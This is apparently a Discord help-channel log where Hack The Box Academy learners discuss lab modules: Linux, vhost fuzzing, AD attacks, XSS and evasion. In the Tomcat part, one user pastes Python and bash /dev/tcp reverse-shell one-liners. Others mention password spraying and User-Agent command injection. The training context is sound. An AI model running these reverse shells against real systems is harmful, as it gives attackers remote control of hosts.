do u guys recommend any video resources to help with for example Linux Fundament...
https://www.youtube.com/watch?v=sWbUDq4S6Y8&themeRefresh=1 The best thing to do is just install linux and use it. You didnt read a book on how to use windows/mac so just explore. Also LLM like chatgpt and gemini help as well.
silk otter
Reading the page, it looks like the target you spawn is a Kali box. If you can't...
I have been using the pwnbox
cloud urchin
i just spawned the target and tried from my VM and had no issues using ssh or rdp to get into the target
silk otter
you sshed then rdp into it fine?
cloud urchin
i ssh'd into the target. i can also xfreerdp into the target.
from within the kali target you then rdp into ws001 according to the question
cloud urchin
i just started typing xfreerdp into a terminal, and it autocompleted into exactly what was needed to remote in
so open a terminal on your target, then use xfreerdp to remote into ws001
silk otter
lol
ok
I cannot paste any images for some reason, but it is giving me the same error
when i ssh and when rdp into the kali machine
cloud urchin
so you rdp into kali, from within that session you open the terminal and can't xfreerdp? you get the same error? i'd try another region or reach out to support on the website
silk otter
so to clarify, I can get into the kali target. Its the windows target I am having trouble with
Can you do it from your end?
fathom pendant
so to clarify, I can get into the kali target. Its the windows target I am havin...
Maybe there's not enough clarity. You connect to the windows target from the Kali target
silk otter
yes
fathom pendant
And i take it what you're having issues with is connecting to the ws001 from the 10.129.x.x kali machine
silk otter
I can get into the kali target but cannot get into the windows target from the kali target as directed
Yes!
fathom pendant
so you rdp into kali, from within that session you open the terminal and can't x...
. Try these suggestions
cloud urchin
i used a vm, not the pwnbox, could be the pwnbox needs some configuration but i doubt it
silk otter
I have not used my own VM yet. I will try that
I think I have tried a different region in the past but I will try again jic
actually my bad
It isnt the same error when I rdp into both
wait what the hell... it worked.
THANKS!
cloud urchin
yup good luck
silk otter
unstable asl
tranquil axle
Hey, did you end up finishing the skill assessment of malicious documents?
rough violet
why is this the wrong answer
cloud urchin
it says ipv4 only
rough violet
"not on localhost & IPv4 only" shouldn't that mean ALL listening services? not just those?
cloud urchin
yeah i guess so
i don't recall that question so i probably haven't done that module sorry
i can see it both ways with the way the question is worded
rough violet
i did the command with the -4 for only IPv4, removed localhost with grep -v & worked
basically copy pasted command from google search actually
fathom pendant
"not on localhost & IPv4 only" shouldn't that mean ALL listening services? not j...
Ipv4 only, not localhost is the better phrasing
fathom pendant
oh forgot to `uniq` or `sort -u`
Avoid leaving answers in your screenshot
rough violet
Avoid leaving answers in your screenshot
mb i was just tryina show the whole picture of what's going on,
i can't solve it
fathom pendant
Do some light editing to block out
rough violet
Do some light editing to block out
aight will do,
daaang should put the uniq before wc -l
fathom pendant
aight will do,
daaang should put the `uniq` before `wc -l`
That's smarter
rough violet
That's smarter
still not working
so two things
why does uniq give different result than sort -u and why does neither of them work
well, i added 1 to the sort -u and somehow that's the answer..
fathom pendant
still not working
so two things
why does `uniq` give different result than `sort...
Because you need to do a fair bit more filtering, and maybe regex (next section iirc)
I've linked a forum answer in the past that describes the commands used
.
ripe wadi
Is there a module on memory scanning, manipulation etc...
ocean night
The first is regarding forensics, the second regarding game hacking
They both have sections that cover memory, but of course forensics.. more on inspecting memory snapshots, game hacking, more on searching, structure and manipulation
ripe wadi
Thanks a bunch
fathom pendant
https://academy.hackthebox.com/module/details/237
https://academy.hackthebox.com...
Not sure how embed works but I wonder if it'd be possible that instead of it showing the generic htb academy embed blurb, it can show the module linked
ocean night
Not sure how embed works but I wonder if it'd be possible that instead of it sho...
Possibly
There is the preview route
It could be possible to detect embed from Discord and rewrite to the public preview page
I agree, it's annoying
fathom pendant
I wonder if it'd be better to get a copyable preview link button π€
I believe the preview uses the module name though
plush lotus
Here are some optional tasks to practice regex that can help us to handle it better and more efficiently. For all exercises, we will use the /etc/ssh/sshd_config file on our Pwnbox instance. why can i not cd to this file
ocean night
I believe the preview uses the module name though
Yeah it does indeed
fathom pendant
Here are some optional tasks to practice regex that can help us to handle it bet...
Yeah they're optional exercises you can use the pwnbox instance for
Regex is useful to learn tbh
But I still use cheatsheets
plush lotus
Yeah they're optional exercises you can use the pwnbox instance for
i am trying to cd to ssh_config
fathom pendant
i am trying to cd to ssh_config
Ssh_config is a file
It's under /etc/ssh directory
plush lotus
vm wont let me cd to the path
fathom pendant
Btw you can specify full filepaths for pretty much any commands
won't let me
Useful error
plush lotus
i did use full path
fathom pendant
Are you using the pwnbox or your own vm
plush lotus
pwnbox
fathom pendant
i did use full path
What's the error you're getting
permission denied
You need to be root/use sudo
plush lotus
think i figured it out
plush lotus
why cant i get into the sshd_config i stopped it at ssh/
fathom pendant
Because that is a file, not directory
π
As stated by the error
Just because it doesn't have a file extension doesn't mean it's a directory
plush lotus
haha ive been at this since 9 am think the wheel is turning and the hamster is dead
fathom pendant
https://tenor.com/view/asdf-asdfmovie-i-can't-read-i-cant-read-punished-lion-gif-3532527054645921660
tranquil axle
Okay I managed to solve the skill assessment of malicious documents, but Iβm pretty sure not the intended way. If someone finds a proper solution let me know lol
dapper moth
I totally forgot how the WriteDACL II SA was fun!
You'll get different stuff each time you do it and in different ways!
shut wraith
Hello I need helo on Intro to White Box Pentesting can I DM anyone
spare condor
AD Enumeration & Attacks - Skills Assessment Part II.
Can someone help me? What am I doing wrong?
plush lotus
ok so in REGex it only changes the color of the line of the syntax
safe star
**AD Enumeration & Attacks - Skills Assessment Part II**.
Can someone help me? ...
why did you upload kerbrute instead of running it on the linux machine?
DomainPasswordSpray wouldve been the better choice there
scenic geode
Hi guyz, I am working on solving a challenge NextPath (Medium difficulty Web Attack)
I wanted to know if I can get some assistance/hints on this part.
I am stuck at how to do directory traversal
spare condor
why did you upload kerbrute instead of running it on the linux machine?
Tbh I thought the attack wouldn't work from linux machine, because I had issues before too..Lemme try
scenic geode
Hi guyz, I am working on solving a challenge NextPath (Medium difficulty Web Att...
I assume it is some kind of encoding. But not able to craft it well.
spare condor
why did you upload kerbrute instead of running it on the linux machine?
It worked from Linux machine...Why tho? Is it because I ran it via evil-winrm on the MS01??
safe star
It worked from Linux machine...Why tho? Is it because I ran it via evil-winrm on...
not sure, just assumed it would work better on linuxπ€·ββοΈ
plush lotus
Hi guyz, I am working on solving a challenge NextPath (Medium difficulty Web Att...
It is important to note that execute permissions are necessary to traverse a directory not sure if that will help i just happen to be reading this.
dark hedge
Hi guyz, I am working on solving a challenge NextPath (Medium difficulty Web Att...
ask in #challenges
to get access, verify your account -> #welcome
civic steeple
hey all, i'm currently revamping my notes as i go through the Pentesters Job Role. Question, I have the services in order from Footprinting and now i'm in the next module, Info Gathering- Web Edition and I'm curious to know if it makes sense to inforporate the DNS & Subdomain notes I'd take from Info Gathering and incorporate them into the notes for DNS in footprinting, thoughts?
Or is this entire Info Gathering process done after you've completed footprinting during a pentest and not really related
fathom pendant
hey all, i'm currently revamping my notes as i go through the Pentesters Job Rol...
Well, it's an extension of dns... in a way
safe star
hey all, i'm currently revamping my notes as i go through the Pentesters Job Rol...
kinda what i did, but with attacking common services
just added it to what i had
civic steeple
Well, it's an extension of dns... in a way
i am about to start Attacking Common Servies once i complete fixing my notes up to Password Attacks
As I came close to completing PA, I realized my notes were complete shit, now they're kind of shit
civic steeple
just added it to what i had
Would you say Footprinting and Attacking Common services mesh together? I assume footprinting touches on the services a bit more than Getting Started and ACS dives way deeper?
tranquil axle
Would you say Footprinting and Attacking Common services mesh together? I assum...
I would suggest you to not organize your notes based on module names but services/techniques
civic steeple
I would suggest you to not organize your notes based on module names but service...
that helps thank you, I am leaning that way but just tough to know for sure without knowing whats coming in the modules to come. I think I'll take the notes best I can from the modules and plan to consolidate as they dig deeper into a service or application. The order of things is what I'm trying to nail down for sure
tranquil axle
I started doing it by module at first too, but whenever I want to consult my notes it is because I found a certain service running on a host and I want to know what I can try. So I see βftpβ and open my ftp notes to see everything, from anonymous login to bruteforcing to CVEs to things that I mightβve encountered in boxes
And then it doesnβt matter what module taught me how to brute force ftp, I just know that thatβs an option for this service
civic steeple
And then it doesnβt matter what module taught me how to brute force ftp, I just ...
Perfect thank you. Do you have everything in one long note or FTP in it's own note, SMB in another, etc?
right now i have everything in one note (in obsidian) but i'm making sure to give everything the proper heading so i can expand sections as needed but still be able to do a "Find" within everything
tranquil axle
Iβm not sure about the perfect setup yet tbh. I used to have one more in obsidian that has each common port and what service is behind it and then linked to a separate note just for ftp
That works well for small services but once you reach AD there is so much to know about that alone that youβll likely need a few pages just for that
And over time the things I would write down in my notes become so βcommon knowledgeβ to me that I probably wouldnβt write them down anymore today. For example I really donβt need a brute force section on every service because I just know I can always try to brute force and what tools to use
civic steeple
And over time the things I would write down in my notes become so βcommon knowle...
ha yea i'm adding notes thinking "i'll probably not need this one eventually". I cant imagine how long the notes for active directory are going to be. Have you taken the CPTS yet? If yes, just curious how you knew you were ready
pearl hare
Hi everyone
tranquil axle
ha yea i'm adding notes thinking "i'll probably not need this one eventually". ...
Havenβt taken it yet, but Iβm pretty sure Iβd pass it? Itβs mostly a time issue for me to find 10 days of βfreeβ time. Iβm happy to learn more and more though, already went through the advanced cert course
civic steeple
Havenβt taken it yet, but Iβm pretty sure Iβd pass it? Itβs mostly a time issue ...
ah sorry to hear. though i'm a ways away, i cant imagine how i'm going to dissapear for 10 days either lol
tranquil axle
Iβve done other stuff like prolabs that are not so time constrained
Realistically if you consider both attempts you have 20 days which should be plenty of time for everything
civic steeple
agreed
cerulean hinge
Hello,
I'm doing the attacking tomcat module. I have my webshell that I want to transform into a reverse shell but I can't manage to find a proper command.
I used various from the shell & payloads course or from cheatsheet I found online based on sh & bash binaries and also I tried to use python. Nothing worked.
Example of payloads :
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- bash -i >& /dev/tcp/IP/PORT 0>&1
- sh -i >& /dev/tcp/IP/PORT 0>&1
IP & PORT were replaced by my IP & listening port.
It is blocked in some ways directly in the box or ? The authenticated RCE module from metasploit is also not working.
tranquil axle
Sometimes βbashβ is not enough and you need to provide β/bin/bashβ instead
You can also try a few revshells from revshells.com
cerulean hinge
even with /bin/bash or /bin/sh it didn't worked
cerulean hinge
You can also try a few revshells from revshells.com
it's what I did !
I used all bash related scripts and nothing worked π¦
tranquil axle
Or worst case download socat onto the machine and use that to establish a shell
cerulean hinge
Or worst case download socat onto the machine and use that to establish a shell
yeah I think uploading socat or a payload is maybe the best option. Thank you I will try this !
proper mountain
hello π₯² ... Can anyone help me with the custom wordlists skill assessment (login bruteforcing)... There was nothing specific given in the question so I went with the creds given in the module itself, but it's taking forever.
fathom pendant
hello π₯² ... Can anyone help me with the custom wordlists skill assessment (logi...
Some googling and research may do you good to create custom wordlists
proper mountain
Some googling and research may do you good to create custom wordlists
auh okie thanks
fathom pendant
As noted by the custom wordlist section, which I'm assuming you're on
haughty karma
has anyone done the prolab zephyr and did your fping come up with more than one ip. Already stuck i feel dumb
fathom pendant
has anyone done the prolab zephyr and did your fping come up with more than one ...
#1263635449335910531 read and follow #welcome to access
wooden seal
Which version of Metasploit comes equipped with a GUI interface? (do i have to answer in version no. or the edition stuff) i am confused
fathom pendant
Which version of Metasploit comes equipped with a GUI interface? (do i have to a...
Edition
wooden seal
got it thanks
wooden seal
i wasted way too much time for this answer omg
wooden seal
https://tenor.com/view/zombies-brains-last-brain-cell-stress-aliens-gif-25550911
is this for me? lmao
wooden seal
nah man i tried every edition it was wrong due to space or some thing i was like wth????
fathom pendant
Version != edition
Edition is like enterprise/professional/public
I believe it's also stated in that section 
proper mountain
As noted by the `custom wordlist` section, which I'm assuming you're on
yes yes that's the one
fathom pendant
yes yes that's the one
Try the dummy data from the examples
cedar ocean
I'm doing https://academy.hackthebox.com/module/254/section/2836 but after bypassing everything, I don't get the shell, can check for me?
https://hackmd.io/_uploads/SkVmzzYBkx.png
proper mountain
Try the dummy data from the examples
ayo that's what I've been doing π₯² still no results
storm elk
I'm doing https://academy.hackthebox.com/module/254/section/2836 but after bypas...
Would you mind posting the module and section? Opening a link on mobile is a pain
cloud urchin
it's intro to windows evasion techniques skill assessment 1
storm elk
it's intro to windows evasion techniques skill assessment 1
Okay π
Didnβt do that one yet
grand portal
could anyone please help me with medium lab in attacking common services?
proper mountain
ayo that's what I've been doing π₯² still no results
ahh shoot it was some error with my hydra thingy idk what happened when I routed my hydra requests through burp proxy it worked
hasty mauve
where can I find the password for the zip file in Documentation & Reporting?
and why is it even protected with a password lol
cloud urchin
pretty sure it's in the module
hasty mauve
pretty sure it's in the module
ok but where? I tried to search but couldn't find it.
I'm still not finished with the module so I might find it along the way but I just want to take a look.
tranquil axle
I'm doing https://academy.hackthebox.com/module/254/section/2836 but after bypas...
Did you pick the right project type? .net project vs .net framework project?
cloud urchin
it's on the intro page
hasty mauve
it's on the intro page
Thank you.
cedar ocean
Did you pick the right project type? .net project vs .net framework project?
Yeah, As shown in the picture I sent, I copied the command in the log and run, I received the alpha shell, but it seems the bot doesn't execute my command or is there something blocking it?
novel matrix
Can i bypass frp withought droid kit
What module is this related 2?
cedar ocean
Skills Assessment II Introduction to Windows Evasion Techniques also encountered the same situation
analog cedar
User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them
Friends, he has more than a thousand flag.txt files, how can I filter out the ones with content?
acoustic owl
Friends, he has more than a thousand flag.txt files, how can I filter out the on...
What happens when you write text to a file? What exactly changes?
analog cedar
I used find to query the flag file and found more than a thousand flags. I donβt know how to determine which file is correct. I wonβt post pictures, sorry.
plush hazel
Yo
coarse python
Yooooo@plush hazel
analog cedar
What happens when you write text to a file? What exactly changes?
Problem solved, thank you for your reply
crimson plinth
Hi brother, did you find the answer and can u give me hint? plz
stark geyser
Module: Intro to C2 Operations with Sliver
Section: Skills Assessment
For the last question, I have tried both the Abuse KRBTGT attack and the TrustKey attack but for both of them, when I try to access the 2nd domain I get a "Access Denied" followed by a "Does not exist" error. Any advice?
midnight verge
CROSS-SITE SCRIPTING(XSS) -Phising. Could someone tell me what I'm doing wrong ? for some reasons
I can't listen to the port 80 ?
autumn pilot
Choose a different port
old wasp
what other port could I use ?
Any other port and specify it in your xss payload
midnight verge
The pwnbox is running on port 80 already
I see
midnight verge
Any other port and specify it in your xss payload
Will try that
midnight verge
Any other port and specify it in your xss payload
it worked thx
midnight verge
Choose a different port
I didn't get wym at first, sorry I'm slow it's 6am rn
toxic apex
Hey, did you end up finishing the skill assessment of malicious documents?
yes, the trick is to use cmd.exe over powershell
analog cedar
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
what should i do
opal nexus
What user account on the Domain Controller has many Event ID (4625) logon failur...
What module are you referring to?
analog cedar
What module are you referring to?
I don't know what to say.
Information security basics
windows
skills assessment
Question 10
ripe wadi
Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb" on the inf gathering web edition i have performed the following scan gobuster vhost -u http://inlanefreight.htb:58757 -w ~/Desktop/wordlists/subdirectories-discover/top1mparams.txt -t 100 --append-domain but i only see some of the vhosts that ar being asked for ````
Found: admin.inlanefreight.htb:58757 Status: 200 [Size: 100]
Found: blog.inlanefreight.htb:58757 Status: 200 [Size: 98]
Found: forum.inlanefreight.htb:58757 Status: 200 [Size: 100]
Found: support.inlanefreight.htb:58757 Status: 200 [Size: 104]
Found: browse.inlanefreight.htb:58757 Status: 200 [Size: 102]
Found: Blog.inlanefreight.htb:58757 Status: 200 [Size: 98]
Found: Admin.inlanefreight.htb:58757 Status: 200 [Size: 100]
am i missing something from the course material on how to enum them
marble minnow
Hey guys! I'm new to htb and as a teenager I don't know from where to start.. I started with the information security foundation path and am halfway into the path.. I have been astonished by ethical hacking when I was young but still don't know my passion lol.. I know basic things nothing else really.. along with htb I'm also taking a 5 hr ethical hacking crash course available on yt and am also looking into learning python
compact matrix
`Brute-force vhosts on the target system. What is the full subdomain that is pre...
try another wordlist
compact matrix
look through seclist
old wasp
are there any specific ones or ?
for the modules, the ones that they specify in the cheatsheets usually work
ripe wadi
i have used it
hasty mauve
Hey guys! I'm new to htb and as a teenager I don't know from where to start.. I ...
as someone who tried both HTB and THM, I'd say start with THM as they tend to be more beginner friendly.
once you have solid foundation, switch to HTB.
you can DM so I can tell you from which module to start and where to go.
marble minnow
Thank you so much,appreciate it!
I thought people were ignoring me since I was dumb? Lol
hasty mauve
I thought people were ignoring me since I was dumb? Lol
no one is ignoring, when someone can help here they will.
old wasp
Hey guys! I'm new to htb and as a teenager I don't know from where to start.. I ...
the paths in academy are beginner friendly
marble minnow
I did till learning progress of the information security foundation path
hasty mauve
the paths in academy are beginner friendly
I don't agree tbh.
especially that academy modules tend to be a mouthful of reading.
marble minnow
I don't agree tbh.
especially that academy modules tend to be a mouthful of read...
True,I only catch up when I read them some times
waxen totem
True,I only catch up when I read them some times
marble minnow
Sorry,guess I have to go to general
analog cedar
help
I can't find the flag. Can anyone give me some hints?
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
ripe wadi
nvm my grep was falsely done i found them
ripe wadi
I don't agree tbh.
especially that academy modules tend to be a mouthful of read...
they are pretty well explained
in my opinion
old wasp
nvm my grep was falsely done i found them
try using ffuf instead of gobuster
It's the best for subdomain fuzzing in my opinion
ripe wadi
try using ffuf instead of gobuster
It's the best for subdomain fuzzing in my opi...
ok, isnt ffuf good for everythong though
just not the best
old wasp
ok, isnt ffuf good for everythong though
I use it with subdomains for the other stuff I use feroxbuster or dirbuster
marble minnow
Guys I'm having a problem...
While entering general,discord asks me if I'm done reading and takes me to modules.. even though I open it and go back to general,the same things pops up again
Sorry I'm asking this here
But I can't open generals
old wasp
But I can't open generals
you need to verify
marble minnow
How?
hasty mauve
I opened welcome,and the same message pops up..
what does the message say? maybe it has the steps to verify
marble minnow
Oh..
alpine pond
Hi guys, is there anyone who can access the skill assessment machine on the module (MSSQL, Exchange, and SCCM Attacks)?
I can't access the RDP since 3 hours ago, I think it's under maintenance or something?
old wasp
spoiler and wrong channel (ask in boxes)
neat warren
Sorry, im new to the dc. Wont happen again!
ripe wadi
guys has anyone installed finalrecon recently
i cant seem, to get it running
and the worst is i tried following the docs for installingit using the git repo
and the .py file is not even there
surreal hedge
guys has anyone installed finalrecon recently
Yes I installed recently
fathom pendant
I had no issues installing on parrot
twin shadow
anyone done this Attacking Wi-Fi Protected Setup - Skills Assessment?
ancient niche
Merry Christmas all
Someone can help me with this please? i can't find the flag π¦
fathom pendant
Help with what?
If you can't find the flag, skill issue /s
Might be best to just view the page itself instead of via burp, then ctrl+f for /root or typical root filesystem stuff
tranquil axle
yes, the trick is to use cmd.exe over powershell
Wow okay, Iβll give that a shot. Thatβs super weird. I ended up looking up the hash of the file on virustotal lol. Thanks for the response!
fathom pendant
Also: quotes are* important
twin shadow
hey @uneven dune Can you check dm?
ancient niche
thank you brother you saved my life π @fathom pendant
fathom pendant
thank you brother you saved my life π <@134323136853311488>
Also once you inject the User Agent you don't need to keep resending it
Which is why it's recommended to visit the page in a browser instead of via burp
So you're not having dozens of different things running the command
hasty mauve
So you're not having dozens of different things running the command
Lol this happened to me on one of the boxes I did XD
ancient niche
how can i unlock HTBP CPTS ?
fathom pendant
how can i unlock HTBP CPTS ?
By paying for the course
fathom pendant
Either silver annual [comes with voucher and access to t2 and below modules] or one month plat, one month gold + voucher
fathom pendant
how can i get access to <#588029217376043023>
#welcome <-- instructions
ancient niche
Either silver annual [comes with voucher and access to t2 and below modules] or ...
the examen is very difficult?
fathom pendant
It's tough but fair
ancient niche
exam sorry xD
fathom pendant
exam sorry xD
It wouldn't be worth it if it was easy
ancient niche
i would like work of this π but i don't have knowledge
fathom pendant
i would like work of this π but i don't have knowledge
Well you need to complete the required path to be able to take the exam anyway
But the exam doesn't deviate from techniques you learned
ancient niche
what do you recommend?
fathom pendant
Huh?
Silver annual is good if you want a walkthrough for when you get stuck, or as a reference to see if something could have been done differently
fathom pendant
Then you aren't learning
Notes can help you get unstuck
Run into error? Note it down and what you did to resolve
proven loom
Yeah generally the solution is "use PwnBox" π
ancient niche
do you recommend me to do a bootcamp?
shut vapor
Seasons Greetings all you far-too dedicated hackers... and regular greetings to those of you for whom this is just another day.
Command Injection's assessment was cool, but boy I felt like I was just smacking away at it for far too long until something worked. Is that largely what hacking is?
tranquil axle
Command Injection's assessment was cool, but boy I felt like I was just smacking...
Yes and no. If you start from a black box perspective and therefore dont know whatβs happening on the machine you are trying to hack you have to try out a few things to see how the service reacts and to discover if there are vulnerabilities. But you are not completely guessing, you have an idea of what could be misconfigured and you try for example common bypasses
So you want to be doing educated guesses eventually
fathom pendant
Yeah generally the solution is "use PwnBox" π
Yeah but you can't run to pwnbox for stuff outside of htb
fathom pendant
?
shut vapor
Yes and no. If you start from a black box perspective and therefore dont know wh...
not very hollywood
j/k, good to know my guesses were educated enough
fathom pendant
but i think that could i do bootcamp?
Tech bootcamps are mostly scams
You don't really learn much because of how fast paced the environment tends to be
ancient niche
You don't really learn much because of how fast paced the environment tends to b...
then? what do you recommend me?
fathom pendant
then? what do you recommend me?
HTB academy is good stuff without a time pressure
And well priced
ancient niche
HTB academy is good stuff without a time pressure
do you think that could i get a job with this?
fathom pendant
Certs don't guarantee jobs, but they can give you a leverage of knowledge and skill
ancient niche
then? π¦
fathom pendant
Skills land jobs
Making yourself stand out
With tech layoffs, companies can find someone with a cert a dime a dozen, so you have to stand out more
ancient niche
you give me a lot of encouragement π¦ xD
fathom pendant
cybersecurity isn't necessarily an entry level thing, especially pentesting Β―_(γ)_/Β―
Entry level pentesting is like mid-level IT
ancient niche
oh my good
fathom pendant
@plush venture also include the module name and section you're on
plush venture
ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:50801/ -H 'Host: FUZZ.academy.htb' -fs 900 -v
module: attacking web application ffuf
section: filtering results
fathom pendant
Try a bigger wordlist
languid geyser
What type of analysis can be used to predict future probabilities? Help please
plush venture
<@701043425029652550> also include the module name and section you're on
but the thing is, its atleast supposed to take 2-3 seconds even if my computer has some sorta alien in it which is helping it to send 5000 req instantly which im sure my computer is incapable of
fathom pendant
What type of analysis can be used to predict future probabilities? Help please
What academy module is this for, it's likely im the reading
fathom pendant
but the thing is, its atleast supposed to take 2-3 seconds even if my computer h...
If you're computer is incapable of it. It wouldn't try
languid geyser
Penetration Testing Process
fathom pendant
Penetration Testing Process
The section should tell you the answer
plush venture
If you're computer is incapable of it. It wouldn't try
thats why im confused it is collecting garbage or smth like that?
fathom pendant
thats why im confused it is collecting garbage or smth like that?
Try a different wordlist
plush venture
Try a different wordlist
okay
plush venture
okay
fathom pendant
Do you have academy.htb in your hosts file?
plush venture
Do you have academy.htb in your hosts file?
oh...
fathom pendant
And is it ip academy.htb [note you don't put the port]
plush venture
i forgot....
plush venture
π
plush venture
https://tenor.com/view/jarvis-jarvis-skill-issue-skill-issue-gif-24471438
am i supposed to keep the port of remove it?
fathom pendant
And is it `ip academy.htb` [note you don't put the port]
.
plush venture
oh, i thought it was intended for smth else
fathom pendant
Who else would I be talking to. Besides a wall
plush venture
Who else would I be talking to. Besides a wall
but cant i just use the ip in ffuf directly?
though it wasn't working
but why not?
fathom pendant
but cant i just use the ip in ffuf directly?
I mean, since you're using the "HOST:
.." header
plush venture
I mean, since you're using the "HOST:
.." header
i removed it and tried with ip once
fathom pendant
In your http request you use the port
plush venture
but it was still the same
ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:50801/ -fs 900 -v
fathom pendant
```ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:50801...
Nope
You still use the host header
Also are you sure 900 is the right filter size
plush venture
it wasnt working if i replaced the academy.htb with ip too and why do i need header?
plush venture
Also are you sure 900 is the right filter size
yes
ancient niche
You still use the host header
are you work of this friend?
fathom pendant
it wasnt working if i replaced the academy.htb with ip too and why do i need hea...
Because of how things are configured
plush venture
Because of how things are configured
okay...
fathom pendant
okay...
If it was a public website a dns server would handle the http://FUZZ.Example.com requests, but since these targets use vhosts you'll need to use host headers, as host header tells the server that you want to request a specific resource on it
Vhosts sit within the webroot of a server
storm elk
Not all vhosts are exposed via dns irl either
fathom pendant
/var/www/html/<vhost>/ and whatever web service is configured to handle those requests and pull the right resources
storm elk
For my clients, the test environments are not in their dns but just in vhosts
plush venture
arent vhosts just subdomains but not present in public dns servers?
@fathom pendant
fathom pendant
arent vhosts just subdomains but not present in public dns servers?
it depends
plush venture
huh?
fathom pendant
Vhosts can be publicly routed
plush venture
nah it alright
storm elk
βhow so? isn't it necessary to have the ip of the domain in order to access the host under it?β
This was what you wrote
plush venture
yes
storm elk
Youβll need the IP of the server, yes. But you can put the (sub)domain in your hosts file and when sending a request, it will tell the (sub)domain youβre looking for in the headers. Thatβs why ffuf vhost enumeration works via the -H "Host: FUZZ.domain.tldβ
plush venture
wdym by putting it in the hosts file?
storm elk
/etc/hosts contains entries to map certain IPs to a hostname
You could call it your personal DNS "phone" book
plush venture
oh i thought you were talking bout files in the server
fathom pendant
Your system checks your hosts file -> public dns
plush venture
i misread it
plush venture
Your system checks your hosts file -> public dns
yes
fathom pendant
If not in hosts it checks public dns servers to see if it's routed
plush venture
Youβll need the IP of the server, yes. But you can put the (sub)domain in your h...
but why couldn't i simply use the ip in place of the url in the command?
fathom pendant
but why couldn't i simply use the ip in place of the url in the command?
You can
storm elk
That should work
Just donβt forget the header, the host needs to be sent. If you donβt send it, the server wonβt know what vhost to serve
plush venture
wait whats the use of header in here?
storm elk
The header will contain the Host you are requesting
plush venture
oh
but isnt that automatically determined by the domain i provide in url?
shit nvm, i need to learn about web stuff a little more
fathom pendant
but isnt that automatically determined by the domain i provide in url?
Only the domain is, not necessarily the header
ancient niche
Only the domain is, not necessarily the header
then do i don't do bootcamp?
fathom pendant
then do i don't do bootcamp?
Don't do bootcamps
As i said, they are mostly scams
Fast paced shit prep
mental warren
Hey, I know that this is not the right place to post thi, but I need a little help with redeeming a gift card in the academy. When i try to redeem it it says that sth went wrong and that i should contact the support. I can't seem to find how to contact them on the site so i decided to post here. I think what my issue is but, for this i would also need help from support.
compact patrolBOT
mental warren
Appreciate
main coyote
Hi, i am stuck in the last assessment question of WPS module. Tried everything including generating list of keys and bruteforcing with bash script. Everything seems to fail. Any help will be appreciated
ancient niche
i'm going to dinner Merry Christmas all
storm elk
i'm going to dinner Merry Christmas all
Enjoy. Merry Christmas
safe star
They tell you why
fathom pendant
Escaping tags
It's told in the section why
The HTB walkthroughs don't explain much of anything because they expect you to have read the material
fathom pendant
if everything returns 200
Look for a common thread to filter out
Like response size
plush venture
how do i find the one required parameter
plush venture
Like response size
how will i know the size?
fathom pendant
It's not gonna be the same as the examples
fathom pendant
how will i know the size?
Ffuf literally tells you the size as part of the result
fathom pendant
You don't need to review all the results
plush venture
-fs ?
plush venture
i thought it gave the ones i needed π
now i know its filtering out π
ok now it makes sense
fathom pendant
now i know its filtering out π
Reading the manual explains how it works
plush venture
yes ill keep that in mind π₯²
fathom pendant
The -f[X] options are options to filter out; the -m[X] options are to match
More often than not you're filtering out junk
cunning frigate
Can anyone help with the evasion module? I have no experience in csharp and windows api so I literally have no idea why it doesnt work
Im in Dynamic Section
plush venture
The -f[X] options are options to filter *out*; the -m[X] options are to *match*
okay idk how but ig i need help with the solution
i cant think of any other possible way
i tried all the possible filters with all the existing file under this domain
safe star
Why are you using 500 threads??
dark hedge
ffuf does stand for Fuzz Faster U Fool
plush venture
Why are you using 500 threads??
idk im just frustrated af, i've been trying to get past this for the past 2 hrs
safe star
Are you filtering the common occurrence?
plush venture
Are you filtering the common occurrence?
yes
safe star
Are u sure thatβs the right parameter?